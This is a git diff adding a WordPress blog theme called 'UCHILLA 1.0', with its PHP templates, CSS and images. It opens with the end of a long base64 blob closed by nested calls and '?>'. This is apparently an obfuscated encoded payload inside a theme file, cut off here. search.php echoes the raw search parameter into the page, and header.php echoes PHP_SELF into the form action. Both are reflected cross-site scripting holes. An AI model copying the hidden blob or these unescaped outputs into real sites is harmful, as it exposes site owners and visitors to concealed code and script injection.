YJwk1wUs3p/kW9oI8KSrbR5eYBLbKYJ2bt9FEhzUOfzaPeXtJRTvHO5oT0QaiQShyflQ11cg8JPsLQb/JU0sxTdV4+MkIi91rHGT8tsDR6H8xCfKIM9Zov2aVvKGnc1oPob5YzqhL4kSxooxdWDt/H5yoWiGD8APlEl4yNdNtPkcFRgafpZYw+5A+A7Vs12/mXbXl7ozmFnKlnECNHiRR9gStgFCxWUh/Fc5osBVXiR1uMtbgrx8fZJUBuYeMIGWJj3zBTOb3shLWN1EnxOWS58yrX/KChTkIz6pdyWVgzjFWLT9+1qvfTlxgM3a9Hh8pfXdcMgNbobDWe8DtXWnyASOa05cBTFzPlVoqZS6mtOv2utvGOO+BFhQfW9AfCosEiLViWsVeF3qUDFIlUWBvXC1bQhgYaxTO9OlQqgL+tUIm159OXam6olO3xGny5jFc4HaSSdTqwpU6Eu3nE0dbkfINfMeDCQemSS/B9nWQvaVhqFI3GNhvrcq54Cy/ndrj6yAOYO97JOaCprBRSws9Fn2yoxw8faLQSgIAAkNghUaSCAI2N///Ocf//z9/vXHX//991//Bw==')))); ?>
\ No newline at end of file
diff --git a/wp-content/themes/uchilla1.0/functions.php b/wp-content/themes/uchilla1.0/functions.php
new file mode 100644
index 0000000000000000000000000000000000000000..34d15646c6135d3673296ee4c32efb3156db64e6
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/functions.php
@@ -0,0 +1,5 @@
+<?php
+if ( function_exists('register_sidebar') ){
+register_sidebar();
+}
+?>
diff --git a/wp-content/themes/uchilla1.0/header.php b/wp-content/themes/uchilla1.0/header.php
new file mode 100644
index 0000000000000000000000000000000000000000..3637170d6bd8f1577013a7f9b4d04ec3781b9ca4
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/header.php
@@ -0,0 +1,39 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head profile="http://gmpg.org/xfn/11">
+<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
+
+<title><?php bloginfo('name'); ?><?php wp_title(); ?></title>
+
+<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats -->
+
+<link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
+<link type="text/css" media="print" rel="stylesheet" href="<?php bloginfo('template_url'); ?>/print.css" />
+<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
+<link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
+<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
+<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
+
+<?php wp_get_archives('type=monthly&format=link'); ?>
+<?php //comments_popup_script(); // off by default ?>
+<?php wp_head(); ?>
+
+</head>
+<body>
+
+<div id="wrapper">
+
+  <div id="header">
+	
+		<h1><a href="<?php echo get_settings('home'); ?>"><?php bloginfo('name'); ?></a></h1>
+		
+		<div class="description"><?php bloginfo('description'); ?></div>
+		
+		<form id="searchform" method="get" action="<?php echo $_SERVER['PHP_SELF']; ?>">
+			<div class="search">
+				<input type="text" name="s" class="text" /> <input type="submit" class="submit" value="Search" name="search" />
+			</div>
+		</form>
+
+
+  </div><!-- end header -->
diff --git a/wp-content/themes/uchilla1.0/images/Thumbs.db b/wp-content/themes/uchilla1.0/images/Thumbs.db
new file mode 100644
index 0000000000000000000000000000000000000000..47d79e00a8ca034772fccac488645c915737f2eb
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/Thumbs.db differ
diff --git a/wp-content/themes/uchilla1.0/images/backgrounds/Thumbs.db b/wp-content/themes/uchilla1.0/images/backgrounds/Thumbs.db
new file mode 100644
index 0000000000000000000000000000000000000000..b0e1c1afef1652e3ad56ed906ede89d8bcc46c0f
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/backgrounds/Thumbs.db differ
diff --git a/wp-content/themes/uchilla1.0/images/backgrounds/dark_mozaik.jpg b/wp-content/themes/uchilla1.0/images/backgrounds/dark_mozaik.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..63e7524f95bf70db075579d04f56b6dc58dfa02c
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/backgrounds/dark_mozaik.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/backgrounds/hearts.jpg b/wp-content/themes/uchilla1.0/images/backgrounds/hearts.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..48e5c8d0e4f563f847d9d939d781bbe9c506f159
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/backgrounds/hearts.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/backgrounds/striped_blue.jpg b/wp-content/themes/uchilla1.0/images/backgrounds/striped_blue.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..2081abcc8204c650a4305afecbe860231d7fe719
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/backgrounds/striped_blue.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/backgrounds/striped_dark.jpg b/wp-content/themes/uchilla1.0/images/backgrounds/striped_dark.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..5680d6ae2a89b165dd8f117ce8c8a0fd735b4b3f
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/backgrounds/striped_dark.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/backgrounds/striped_dark_1.jpg b/wp-content/themes/uchilla1.0/images/backgrounds/striped_dark_1.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..8b843393edb3f95e27bb16e6b4e23b93f41d2d7b
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/backgrounds/striped_dark_1.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/backgrounds/striped_green.jpg b/wp-content/themes/uchilla1.0/images/backgrounds/striped_green.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..180fc6101dbf583585ef275e7f9662ce2e6813ae
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/backgrounds/striped_green.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/backgrounds/striped_purple.jpg b/wp-content/themes/uchilla1.0/images/backgrounds/striped_purple.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..4b45cf20d3cd6c4967aae5a798c331827dc254bd
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/backgrounds/striped_purple.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/blockquote1.png b/wp-content/themes/uchilla1.0/images/blockquote1.png
new file mode 100644
index 0000000000000000000000000000000000000000..d27ce49ca38cb81480fb3667c3bd0d7300a4c2b1
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/blockquote1.png differ
diff --git a/wp-content/themes/uchilla1.0/images/blockquote2.png b/wp-content/themes/uchilla1.0/images/blockquote2.png
new file mode 100644
index 0000000000000000000000000000000000000000..87911136defae40b6416085ff1a83831e15e429d
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/blockquote2.png differ
diff --git a/wp-content/themes/uchilla1.0/images/contBg.jpg b/wp-content/themes/uchilla1.0/images/contBg.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..7e32575789f9236222980bdef7a806350f81ccb4
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/contBg.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/dateBg.jpg b/wp-content/themes/uchilla1.0/images/dateBg.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..f72b074438cf1765aef8e876fba19fa37f0d7177
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/dateBg.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/gravatar.jpg b/wp-content/themes/uchilla1.0/images/gravatar.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..12beeda676413053a85071183e438babdb2dfd73
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/gravatar.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/post-image.jpg b/wp-content/themes/uchilla1.0/images/post-image.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..10014fcd44193a67d349600ab3b74876aac8c889
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/post-image.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/sidebarBullet.jpg b/wp-content/themes/uchilla1.0/images/sidebarBullet.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..9ab53cd21d0f4fa7839c14a1a45ef6151a9d579f
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/sidebarBullet.jpg differ
diff --git a/wp-content/themes/uchilla1.0/images/sidebarLine.jpg b/wp-content/themes/uchilla1.0/images/sidebarLine.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..ab20b539fc752938887a09485356025b33b1788d
Binary files /dev/null and b/wp-content/themes/uchilla1.0/images/sidebarLine.jpg differ
diff --git a/wp-content/themes/uchilla1.0/index.php b/wp-content/themes/uchilla1.0/index.php
new file mode 100644
index 0000000000000000000000000000000000000000..6a92427535572eb89e8f9af9f69f9548006e63d4
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/index.php
@@ -0,0 +1,60 @@
+<?php get_header(); ?>
+
+		<div id="main" class="clear">
+	   <div id="content">
+
+	<?php
+	if (have_posts()) :	 ?> 
+		
+	<?php
+	while (have_posts()) : the_post();
+	$image = get_post_meta($post->ID, 'photo', true);
+	?>
+				
+				<div class="post clear" id="post-<?php the_ID(); ?>">
+				<div class="entry-date">
+					<div class="entry-day"><?php the_time('d'); ?></div>
+					<div class="entry-month"><?php the_time('M'); ?></div>
+					<div class="entry-year"><?php the_time('Y'); ?></div>
+				</div>	
+				<h2><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title(); ?>"><?php the_title(); ?></a></h2>			
+				<span class="entry-filed">Category: <span class="catposted"><?php the_category(', ') ?></span></span>
+				<div class="entry-content">
+					<?php if($image!=''): ?>
+						<div class="image"><img src="<?=$image?>" alt="<?php the_title(); ?>" /></div>
+					<?php endif; ?>
+					<?php the_excerpt(''); ?>
+				</div>
+				
+				<div style="clear:both"></div>
+				
+				<p><a href="<?php the_permalink() ?>" class="more-link">Continue reading &raquo;</a> <span class="comments_link"><?php comments_popup_link('No comments', '1 Comment', '% Comments'); ?></span></p>
+				
+		      <?php wp_link_pages();?>
+
+	
+  	</div>
+  	<!-- end the post div-->
+	<?php endwhile; ?>
+
+		<div class="navigation">
+			<div class="alignleft"><?php next_posts_link('&laquo; Previous Entries') ?></div>
+			<div class="alignright"><?php previous_posts_link('Next Entries &raquo;') ?></div>
+		</div>
+		
+	<?php else : ?>
+		
+		<h2>Nothing found</h2>
+		<p class="center">Sorry, but you are looking for something that isn't here.</p>
+		<p><a href="javascript:history.back(-1)"><strong>&laquo; Go back</strong></a></p>
+    
+	<?php endif; ?>
+
+
+    </div>
+    <!-- end content div-->
+     	   	
+<?php get_sidebar(); ?>
+  </div>
+  <!-- end the main div-->
+<?php get_footer(); ?>
diff --git a/wp-content/themes/uchilla1.0/page.php b/wp-content/themes/uchilla1.0/page.php
new file mode 100644
index 0000000000000000000000000000000000000000..2082a21e40f6597d319b79bb62ec3903d888b71e
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/page.php
@@ -0,0 +1,26 @@
+<?php get_header(); ?>
+
+		<div id="main" class="clear">
+	   <div id="content">
+
+    <?php if (have_posts()) : while (have_posts()) : the_post(); ?>
+		<div class="post" id="post-<?php the_ID(); ?>">
+		<h2 class="singlePostTitle"><?php the_title(); ?></h2>
+			<div class="entry-text">
+				<?php the_content('<p class="serif">Read the rest of this page &raquo;</p>'); ?>
+	
+				<?php wp_link_pages('<p><strong>Pages:</strong> ', '</p>', 'number'); ?>
+	
+			</div>
+		</div>
+	  <?php endwhile; endif; ?>	<?php edit_post_link('Edit this entry.', '<p>', '</p>'); ?>
+	  	  	<?php comments_template(); ?>
+
+
+ </div> <!-- end content div-->
+ 
+  	  
+ 
+<?php get_sidebar(); ?>
+  </div>                  <!-- end the main div-->
+<?php get_footer(); ?>
diff --git a/wp-content/themes/uchilla1.0/print.css b/wp-content/themes/uchilla1.0/print.css
new file mode 100644
index 0000000000000000000000000000000000000000..d096f4fce7479831109bb7f45712ae212cd62e8e
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/print.css
@@ -0,0 +1,10 @@
+/*
+PRINT STYLESHEET
+*/
+
+
+#header, #sidebar, #sidebar-small, #footer, #respond, #commentform {display: none;}
+
+#content {width: 100%; margin: 0; float: none; font-size: 1.2em;}
+
+a:link, a:visited {color: #000000; text-decoration: underline;}
diff --git a/wp-content/themes/uchilla1.0/screenshot.png b/wp-content/themes/uchilla1.0/screenshot.png
new file mode 100644
index 0000000000000000000000000000000000000000..9bd3fc3d91a08166fa73c1c381b3abfdf014d85d
Binary files /dev/null and b/wp-content/themes/uchilla1.0/screenshot.png differ
diff --git a/wp-content/themes/uchilla1.0/search.php b/wp-content/themes/uchilla1.0/search.php
new file mode 100644
index 0000000000000000000000000000000000000000..ad8f723b7c2a441b4b9374de5bfe68e562adb6e5
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/search.php
@@ -0,0 +1,65 @@
+<?php get_header(); ?>
+
+<div id="main" class="clear">  
+<div id="content">
+
+    <?php if (have_posts()) : ?>
+
+    <h1 class="pagetitle">Search Results <?php if(isset($_REQUEST['s']) && trim($_REQUEST['s'])!=''):?>for: <strong><?=$_REQUEST['s']?></strong> <?php endif; ?></h1>
+
+    <div class="navigation">
+      <div class="alignleft"><?php next_posts_link('&laquo; Previous Entries') ?></div>
+      <div class="alignright"><?php previous_posts_link('Next Entries &raquo;') ?></div>
+    </div>
+
+    <?php
+    while (have_posts()) : the_post();
+    $image = get_post_meta($post->ID, 'photo', true);
+    ?>
+
+    <div class="post clear" id="post-<?php the_ID(); ?>">
+				<div class="entry-date">
+					<div class="entry-day"><?php the_time('d'); ?></div>
+					<div class="entry-month"><?php the_time('M'); ?></div>
+					<div class="entry-year"><?php the_time('Y'); ?></div>
+				</div>	
+				<h2><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title(); ?>"><?php the_title(); ?></a></h2>			
+				<div class="entry-filed">Category: <span class="catposted"><?php the_category(', ') ?></span></div>
+				<div class="entry-content">
+					<?php if($image!=''): ?>
+						<div class="image"><img src="<?=$image?>" alt="<?php the_title(); ?>" /></div>
+					<?php endif; ?>
+					<?php the_excerpt(''); ?>
+				</div>
+				
+				<div style="clear:both"></div>
+				
+				<p><a href="<?php the_permalink() ?>" class="more-link">Continue reading &raquo;</a> <span class="comments_link"><?php comments_popup_link('No comments', '1 Comment', '% Comments'); ?></span></p>
+				
+		      <?php wp_link_pages();?>
+
+	
+  	</div>
+
+    <?php endwhile; ?>
+
+    <div class="navigation">
+      <div class="alignleft"><?php next_posts_link('&laquo; Previous Entries') ?></div>
+      <div class="alignright"><?php previous_posts_link('Next Entries &raquo;') ?></div>
+    </div>
+
+    <?php else : ?>
+
+	    <h2>Nothing found</h2>
+		<p class="center">Sorry, but you are looking for something that isn't here.</p>
+		<p><a href="javascript:history.back(-1)"><strong>&laquo; Go back</strong></a></p>
+
+    <?php endif; ?>
+
+  </div> <!-- end content -->
+  
+  <?php get_sidebar(); ?>
+  
+ </div> <!-- end main -->
+
+<?php get_footer(); ?>
diff --git a/wp-content/themes/uchilla1.0/sidebar.php b/wp-content/themes/uchilla1.0/sidebar.php
new file mode 100644
index 0000000000000000000000000000000000000000..dbcaf0a6a9d02542a70060fb75f300cb3cf30043
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/sidebar.php
@@ -0,0 +1,6 @@
+<div id="sidebar">
+		<ul>
+			<?php if ( !function_exists('dynamic_sidebar') || !dynamic_sidebar() ) : ?>
+			<?php endif; ?>			
+		</ul>
+	</div>
diff --git a/wp-content/themes/uchilla1.0/single.php b/wp-content/themes/uchilla1.0/single.php
new file mode 100644
index 0000000000000000000000000000000000000000..49d13450eb1cce9bad53d897e426fe2ee7c4719f
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/single.php
@@ -0,0 +1,79 @@
+<?php get_header(); ?>
+
+<div id="main" class="clear">
+	   <div id="content">
+				
+  <?php if (have_posts()) : while (have_posts()) : the_post(); ?>
+	
+		<div class="navigation postNav clear">
+			<div class="alignleft"><?php previous_post_link('&laquo; %link') ?></div>
+			<div class="alignright"><?php next_post_link('%link &raquo;') ?></div>
+		</div>
+	
+		<div class="post single clear" id="post-<?php the_ID(); ?>">
+			
+			<div class="entry-date">
+					<div class="entry-day"><?php the_time('d'); ?></div>
+					<div class="entry-month"><?php the_time('M'); ?></div>
+					<div class="entry-year"><?php the_time('Y'); ?></div>
+				</div>
+			
+			<h2 class="singlePostTitle"><?php the_title(); ?></h2>
+	
+			<div class="entry-text">
+				<?php the_content('<p class="serif">Read the rest of this entry &raquo;</p>'); ?>
+				
+				<br /><br />
+	
+				<?php wp_link_pages('<p><strong>Pages:</strong> ', '</p>', 'number'); ?>
+				
+				<?=get_the_tag_list('<span class="entry-filed">Tags: ',', ','</span>')?>
+	
+				<div class="underpost">
+					
+						This entry was posted
+						
+						on <?php the_time('l, F jS, Y') ?> at <?php the_time() ?>
+						and is filed under <?php the_category(', ') ?>.
+						You can follow any responses to this entry through the <?php comments_rss_link('RSS 2.0'); ?> feed. 
+						
+						<?php if (('open' == $post-> comment_status) && ('open' == $post->ping_status)) {
+							// Both Comments and Pings are open ?>
+							You can <a href="#respond">leave a response</a>, or <a href="<?php trackback_url(true); ?>" rel="trackback">trackback</a> from your own site.
+						
+						<?php } elseif (!('open' == $post-> comment_status) && ('open' == $post->ping_status)) {
+							// Only Pings are Open ?>
+							Responses are currently closed, but you can <a href="<?php trackback_url(true); ?> " rel="trackback">trackback</a> from your own site.
+						
+						<?php } elseif (('open' == $post-> comment_status) && !('open' == $post->ping_status)) {
+							// Comments are open, Pings are not ?>
+							You can skip to the end and leave a response. Pinging is currently not allowed.
+			
+						<?php } elseif (!('open' == $post-> comment_status) && !('open' == $post->ping_status)) {
+							// Neither Comments, nor Pings are open ?>
+							Both comments and pings are currently closed.			
+						
+						<?php } edit_post_link('Edit this entry.','',''); ?>
+						
+					
+				</div><!-- end underpost div-->
+	
+			</div><!-- end entry-text div -->
+			
+		</div><!-- end post div-->
+		
+	<?php comments_template(); ?>
+	
+	<?php endwhile; else: ?>
+	
+		<p>Sorry, no posts matched your criteria.</p>
+	
+<?php endif; ?>
+
+ </div> <!-- end content div-->
+ 
+ 	  
+
+<?php get_sidebar(); ?>
+  </div>                  <!-- end the main div-->
+<?php get_footer(); ?>
diff --git a/wp-content/themes/uchilla1.0/style.css b/wp-content/themes/uchilla1.0/style.css
new file mode 100644
index 0000000000000000000000000000000000000000..9f0526c601cdb7d3461634a491b174cc22bb39c8
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/style.css
@@ -0,0 +1,645 @@
+/*
+Theme Name: UCHILLA 1.0
+Theme URI: http://www.toastedweb.si
+Description: UCHILLA 1.0 - nice and simple personal blog
+Tags: fixed-width, two-columns, right-sidebar
+Version: 1.0
+Author: Mihael Zadravec
+Author URI: http://www.uchillatheme.com
+
+	The CSS, XHTML and design is released under GPL:
+	http://www.opensource.org/licenses/gpl-license.php
+	
+*/
+
+/* CLEAR FLOATS (clearfix)
+*******************************************************/
+.clear { display: inline-block; }   
+.clear:after, .container:after {
+content: ".";
+display: block;
+height: 0; 
+clear: both; 
+visibility: hidden;
+}
+.clear { display: block; }
+/*******************************************************/
+
+
+
+body {
+	font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
+	font-size: 12px;
+	margin: 0px;
+	padding: 0px;
+	color: #555555;
+	background:#1A1A1A url(images/backgrounds/striped_dark.jpg) top repeat;
+}
+
+a {
+	color:#900;
+	text-decoration:none;
+}
+
+p {line-height:140%;}
+
+#wrapper {
+	position:relative;
+	width: 860px;
+	margin: 12px auto 20px auto;
+	padding: 0px;
+}
+#header {
+	padding:30px 0px;
+}
+#main {
+	background-image: url(images/contBg.jpg);
+	background-repeat:repeat-y;
+	background-position:right top;
+	-moz-border-radius: 10px;  
+	-webkit-border-radius: 10px;
+}
+#content {
+	width: 510px; /*480*/
+	padding:30px;
+	float: left;
+}
+#sidebar {
+	width: 260px;
+	float: left;
+	padding:15px 15px 50px 15px;
+	margin: 0;
+}
+#sidebar-small {
+	width: 160px;
+	float: left;
+	padding: 10px;
+	margin: 0;
+	background:#FFF;
+}
+#footer {
+	height: 42px;
+	clear: both;
+	text-align: center;
+	padding: 13px 0 0 0;
+	color:#DDD;
+}
+
+
+.description {
+	clear: left;
+	padding: 5px 0 5px 0;
+	margin-left:45px;
+	color:#DDD;
+}
+.post {
+	position:relative;
+	border-bottom:solid 1px #DDD;
+	padding-bottom:20px;
+	margin-bottom:20px;
+}
+
+
+.postNav {
+	margin-bottom:20px;
+	padding-bottom:20px;
+	border-bottom:solid 1px #DDD;
+}
+
+.entry-content, .entry-excerpt {
+	clear: left;
+}
+.navigation {
+  clear: both;
+}
+.avatar {
+  float: right;
+  margin: 0 0 3px 5px;
+}
+.entry-meta {
+  margin: 0 0 10px 0;
+}
+
+.entry-filed {
+	display:inline-block;
+	background:#efefef;
+	padding:3px 5px;
+	font-size:11px;
+	-moz-border-radius: 5px;  
+	-webkit-border-radius: 5px;
+}
+
+
+.underpost {
+	padding:5px 7px;
+	margin-top:15px;
+	font-size: 10px;
+	background:#EFEFEF;
+	-moz-border-radius: 5px;  
+	-webkit-border-radius: 5px;
+	line-height:140%;
+}
+#content .underpost a {
+	text-decoration: underline;
+}
+
+a.more-link {
+	color:#056C9F;
+	text-decoration:none;
+	font-style:italic;
+	font-size:14px;
+	font-weight:bold;
+	margin-right:10px;
+}
+a.more-link:hover {
+	color:#900;
+}
+
+span.comments_link a {
+	display:inline-block;
+	padding:0 5px!important;
+	color:#666;
+	background:#EFEFEF;
+	font-size:11px;
+	-moz-border-radius: 5px;  
+	-webkit-border-radius: 5px;
+}
+
+.image {
+	display:inline-block;
+	width:510px;
+	border:solid #000;
+	border-width:1px 0;
+	margin:15px 0 5px 0;
+}
+.image img {
+	border:none;
+	display:block;
+}
+
+
+#content a:link, #content a:visited {
+	padding: 2px;
+}
+#content a:hover {
+	text-decoration: none;
+}
+#footer a:link, #footer a:visited {
+	color: #7b7b23;
+}
+#footer a:hover {
+	text-decoration: none;
+}
+
+#menu{
+	padding: 0;
+	white-space: nowrap;
+	margin: 0;
+	background:#1A1A1A;
+	border-bottom:solid 5px #555;
+}
+#menu ul {
+	margin: 0px;
+	padding: 0px;
+	height:30px;
+}
+#menu li {
+	padding:0;
+	display: inline;
+	list-style-type: none;
+}
+#menu li a:link, #menu li a:visited {
+	display:inline-block;
+	text-decoration: none;
+	padding:0 15px;
+	color:#FFF;
+	border-right:solid 1px #555;
+	height:30px;
+	line-height:30px;
+}
+#menu li a:hover {
+	text-decoration: underline;
+}
+
+
+/* SIDEBAR
+---------------------------------------*/
+
+#sidebar ul, #sidebar-small ul {
+	margin: 0px;
+	padding: 0px;
+	list-style-type: none;
+}
+
+#sidebar li {
+	padding-bottom:15px;
+}
+
+#sidebar li li {
+	background:none;
+	padding-bottom:0;
+}
+
+#sidebar li a {
+	display: block;
+	text-decoration: none;
+	border-bottom:dotted 1px #DDD;
+	padding:3px 0;
+	padding-left:10px;
+	background:url(images/sidebarBullet.jpg) left center no-repeat;
+}
+
+* html #sidebar li li a {
+	width:90%;
+}
+* html #sidebar li li li a {
+	width:80%;
+}
+
+#sidebar li.cat-item a {
+	color:#056C9F;
+}
+
+#sidebar li li li a,
+#sidebar li.cat-item li a {
+	color:#515151;
+	font-size:11px;
+}
+
+#sidebar li.widget_recent_entries a,
+#sidebar li.widget_recent_comments a {
+	color:#515151;
+	background:none;
+	padding-left:0;
+}
+#sidebar li.widget_recent_comments li {
+	border-bottom:dotted 1px #DDD;
+}
+#sidebar li.widget_recent_comments li a {
+	border:none;
+}
+
+#sidebar li a:hover {
+	text-decoration: underline;
+}
+#sidebar ul ul {
+	margin-top:-5px;
+  	margin-left: 0px;
+}
+#sidebar ul ul li, #sidebar ul ul li {
+  margin-left: 10px;
+}
+#sidebar ul ul ul {
+	margin-top:0;
+}
+
+
+#header h1 {
+	margin:0;
+	padding:0;
+	margin-left:30px;
+	font-size: 2.6em;
+	font-weight:normal;
+}
+#header h1 a:link, #header h1 a:visited {
+	float: left;
+	font-family: Georgia, "Times New Roman", Times, serif;
+	margin: 0px;
+	width: 600px;
+	padding: 0;
+	clear: both;
+	color:#CDCD2D;
+	text-decoration:none;
+}
+#header h1 a:hover {
+	text-decoration: none;
+}
+#content h1 {
+	font-size: 18px;
+}
+#sidebar h1 {
+	font-size: 16em;
+}
+#sidebar h2 {
+	font-size: 11px;
+	font-weight:bold;
+	padding-bottom:10px;
+	margin-bottom:10px;
+	background:url(images/sidebarLine.jpg) bottom repeat-x;
+	text-transform:uppercase;
+	color:black;
+}
+.post h2 {
+	font-size: 24px;
+	margin: 0 0 10px 0;
+	padding: 0;
+	font-weight:normal;
+}
+.post h2 a {
+	color:#1A1A1A;
+	text-decoration:none;
+}
+
+h1.pagetitle {
+	font-size:26px;
+	font-weight:normal;
+	padding-bottom:20px;
+	margin-bottom:20px;
+	margin-top:0;
+	border-bottom:solid 1px #DDD;
+	font-style:italic;
+	
+}
+
+.entry-date {
+	position:absolute;
+	top:0;
+	left:-80px;
+	width: 60px;
+	font-family: Georgia, "Times New Roman", Times, serif;
+	background:#056C9F url(images/dateBg.jpg) right bottom no-repeat;
+	color: #FFF;
+	text-align: center;
+	padding:0 0 5px 0;
+	-moz-border-radius: 5px;  
+	-webkit-border-radius: 5px;
+}
+.entry-month {
+	font-size: 19px;
+	line-height:100%;
+	
+}
+.entry-day {
+	font-size: 28px;
+	font-weight: bold;
+}
+
+
+#respond {
+	margin:0;
+	padding:20px 0;
+}
+
+#respond p {
+	font-size:12px;
+	margin-bottom:10px;
+}
+
+#respond textarea {
+	width:450px;
+	height:150px;
+}
+#respond input, .commentsblock textarea {
+	border:1px solid #d1d1d1;
+	background:#FFF;
+	padding:5px;
+	font:normal 11px Tahoma, Arial, Helvetica, sans-serif;
+}
+
+#respond input.txt {
+	width:250px;
+	margin-right:10px;
+}
+
+
+#respond input#submit {
+	display:inline-block;
+	padding:5px 10px;
+	background:#7B7B23;
+	border:none;
+	color:white;
+	cursor:pointer;
+	font-size:12px;
+	-moz-border-radius: 5px;  
+	-webkit-border-radius: 5px;
+}
+
+.commentauthor{
+	display:block;
+	font-size:11px;
+}
+ol.commentlist{
+	color:#777;
+	font-size:0.9em;
+	list-style-type:none;
+	margin:0;
+	margin-top:15px;
+	padding:0;
+}
+.commentlist li {
+	margin-bottom:10px;
+	padding:7px 10px 0px 10px;
+	-moz-border-radius: 5px;  
+	-webkit-border-radius: 5px;
+}
+
+.commentlist li p {
+	padding-right:20px;
+	
+}
+
+.commentlist li img {
+	margin-top:4px;
+}
+
+.alt{
+	background:#f3f5e9;
+}
+h3#comments{
+font-size:16px;
+margin-bottom:10px;
+}
+
+#respond {
+	margin-bottom:10px;
+}
+
+.comment-author {
+	font-size:14px;
+}
+
+.commentmetadata {
+	display:block;
+	margin:0;
+	padding:0;
+}
+.commentmetadata,
+.commentmetadata a {
+	color:#555;
+}
+
+.commentsblock h3 {
+	border:none!important;
+}
+
+
+blockquote {
+  font: 1.2em/1.6em Georgia, "Times New Roman", Times, serif;
+  width: 350px;
+  background: url(images/blockquote1.png) no-repeat right bottom;
+  padding: 0 10px 0 30px;
+  text-indent: -30px;
+}
+blockquote p:first-letter {
+  background: url(images/blockquote2.png) no-repeat left center;
+  padding: 0 0 0 30px;
+  font: italic 1.7em Georgia, "Times New Roman", Times, serif;
+}
+
+.alignleft {
+  float: left;
+}
+.alignright {
+  float: right;
+}
+img.aligncenter, div.aligncenter {
+	display: block;
+	margin: 0 auto;
+}
+img.alignright, div.alignright {
+	margin: 1px 0 2px 10px;
+	display: inline;
+}
+img.alignleft, div.alignleft {
+	margin: 1px 10px 2px 0;
+	display: inline;
+}
+
+.wp-caption {
+	background:#EFEFEF;
+	padding:5px;
+	width:auto!important;
+	border:solid 1px #DDD;
+	-moz-border-radius: 5px;  
+	-webkit-border-radius: 5px;
+}
+p.wp-caption-text {
+	font-size:11px;
+	text-align:center;
+	margin:5px 0 0 0;
+	padding:0;
+}
+
+.wp-caption a {
+	margin:0;
+	padding:0;
+}
+
+.wp-caption img {
+	margin:0;
+	padding:0;
+	border:solid 1px #DDD;
+}
+
+
+a.image:link, a.image:visited, a.image:hover {
+	background: none;
+	padding: 0;
+}
+a.image img {
+	border: none;
+}
+
+/* SEARCH
+------------------------------------*/
+
+#searchform {
+	position:absolute;
+	top:40px;
+	right:10px;
+}
+
+#searchform input.text {
+	border:solid 1px #7B7B23;
+	background:#222;
+	font-size:12px;
+	padding:5px;
+	color:#DDD;
+	width:190px;
+}
+
+#searchform input.submit {
+	display:inline-block;
+	border:none;
+	background:none;
+	font-size:12px;
+	padding:5px;
+	color:#DDD;
+	cursor:pointer;
+	text-transform:uppercase;
+}
+
+
+/* POST HEADINGS
+------------------------------------*/
+.post h2.singlePostTitle {
+	font-size:30px;
+}
+
+.post h2.page {
+	border-bottom:solid 1px #DDD;
+	padding-bottom:15px;
+	margin-bottom:20px;
+}
+
+#content .post .entry-text h1,
+#content .post .entry-text h2,
+#content .post .entry-text h3,
+#content .post .entry-text h4,
+#content .post .entry-text h5,
+#content .post .entry-text h6 {
+	margin: 0 0 10px 0;
+	padding: 0;
